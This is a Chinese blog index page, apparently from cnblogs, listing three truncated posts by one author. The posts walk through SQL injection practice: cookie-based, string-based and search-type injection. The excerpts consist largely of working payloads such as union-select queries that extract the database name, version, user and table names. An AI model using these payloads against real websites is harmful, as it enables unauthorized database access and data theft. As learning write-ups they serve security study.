实战cookie注入
摘要:第一步:登录账号,获取cookie 第二步:抓包发送repeater 第三步:测试是否存在注入点 payload:' and 1=1 # 第四步:查看多少张表 payload:' order by 4 # 第五步:查看显示位 payload:-admin' union select 1,2,3 #
阅读全文
posted @
2025-01-07 17:03
Ad1ey
阅读(20)
推荐(0)
实战字符串注入
摘要:1.-1 ' order by 3 %23 2.-1 ' union select 1,2,3 %23 3.-1 ' union select 1,database(),version() %23 4.-1 ' union select 1,group_concat(table_name),3 fr
阅读全文
posted @
2025-01-06 20:27
Ad1ey
阅读(18)
推荐(0)
实战搜索型注入
摘要:payload:% payload:aa' or 1=1 # payload:%' order by 5 # payload:%' order by 6 # payload:%' union select 1,2,3,4,5 # payload:%' union select 1,user(),ve
阅读全文
posted @
2025-01-05 01:48
Ad1ey
阅读(23)
推荐(0)
浙公网安备 33010602011771号